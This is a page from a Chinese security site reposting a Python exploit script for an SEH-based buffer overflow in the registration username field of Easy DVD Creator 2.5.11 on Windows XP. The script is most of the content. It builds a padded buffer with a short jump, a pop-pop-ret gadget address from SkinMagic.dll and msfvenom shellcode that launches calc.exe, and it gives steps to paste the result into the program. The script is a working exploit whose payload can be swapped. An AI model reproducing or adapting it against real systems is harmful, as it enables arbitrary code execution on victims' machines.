首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Easy DVD Creator 2.5.11 Buffer Overflow
来源:spiritedwolf@protonmail.com 作者:Singh 发布时间:2018-08-02  
#!/usr/bin/env python

# Exploit Title     : Easy DVD Creator 2.5.11 - Buffer Overflow in 'Registration UserName Field' (SEH)  
# Discovery by      : Shubham Singh
# Known As          : Spirited Wolf [Twitter: @Pwsecspirit]
# Email             : spiritedwolf@protonmail.com
# Youtube Channel   : www.youtube.com/c/Pentestingwithspirit 
# Discovey Date     : 29/07/2018
# Software Link     : http://www.divxtodvd.net/dvd-creator.htm
# Tested Version    : 2.5.11
# Tested on OS      : Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt".
#                     Just copy the text inside "exploit.txt" and start the Easy DVD Creator 2.5.11 program and click on "Register".
#                     In the third field i.e "Enter User Name" paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator poped up.
# Greetz            :  @FuzzySec @LiveOverflow @hexachordanu

buffer = "\x41" * 996
#Short Jump address
nseh = "\xeb\x06\x90\x90" 
#0x10037859 : pop ebx # pop eax # ret  | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False,
# v1.8.1.1 (C:\Program Files\Easy DVD Creator\SkinMagic.dll)
seh= "\x59\x78\x03\x10"
#badchar \x00\x0a\x0d
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d' -f python
buf =  ""
buf += "\xbf\x4d\xb3\x6b\x1e\xda\xda\xd9\x74\x24\xf4\x58\x33"
buf += "\xc9\xb1\x31\x31\x78\x13\x83\xe8\xfc\x03\x78\x42\x51"
buf += "\x9e\xe2\xb4\x17\x61\x1b\x44\x78\xeb\xfe\x75\xb8\x8f"
buf += "\x8b\x25\x08\xdb\xde\xc9\xe3\x89\xca\x5a\x81\x05\xfc"
buf += "\xeb\x2c\x70\x33\xec\x1d\x40\x52\x6e\x5c\x95\xb4\x4f"
buf += "\xaf\xe8\xb5\x88\xd2\x01\xe7\x41\x98\xb4\x18\xe6\xd4"
buf += "\x04\x92\xb4\xf9\x0c\x47\x0c\xfb\x3d\xd6\x07\xa2\x9d"
buf += "\xd8\xc4\xde\x97\xc2\x09\xda\x6e\x78\xf9\x90\x70\xa8"
buf += "\x30\x58\xde\x95\xfd\xab\x1e\xd1\x39\x54\x55\x2b\x3a"
buf += "\xe9\x6e\xe8\x41\x35\xfa\xeb\xe1\xbe\x5c\xd0\x10\x12"
buf += "\x3a\x93\x1e\xdf\x48\xfb\x02\xde\x9d\x77\x3e\x6b\x20"
buf += "\x58\xb7\x2f\x07\x7c\x9c\xf4\x26\x25\x78\x5a\x56\x35"
buf += "\x23\x03\xf2\x3d\xc9\x50\x8f\x1f\x87\xa7\x1d\x1a\xe5"
buf += "\xa8\x1d\x25\x59\xc1\x2c\xae\x36\x96\xb0\x65\x73\x68"
buf += "\xfb\x24\xd5\xe1\xa2\xbc\x64\x6c\x55\x6b\xaa\x89\xd6"
buf += "\x9e\x52\x6e\xc6\xea\x57\x2a\x40\x06\x25\x23\x25\x28"
buf += "\x9a\x44\x6c\x4b\x7d\xd7\xec\xa2\x18\x5f\x96\xba"

nops = "\x90" * 16

exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf))
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Switch Port Mapping Tool 2.81
·My Video Converter 1.5.24 Buff
·MicroFocus Secure Messaging Ga
·Allok Fast AVI MPEG Splitter 1
·SonicWall Global Management Sy
·Sun Solaris 11.3 AVS - Local K
·Vtiger CRM 6.3.0 Authenticated
·Imperva SecureSphere 11.5 / 12
·Charles Proxy 4.2 Local Root P
·CoSoSys Endpoint Protector 4.5
·fusermount Restriction Bypass
·SecureSphere 12.0.0.50 - SealM
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved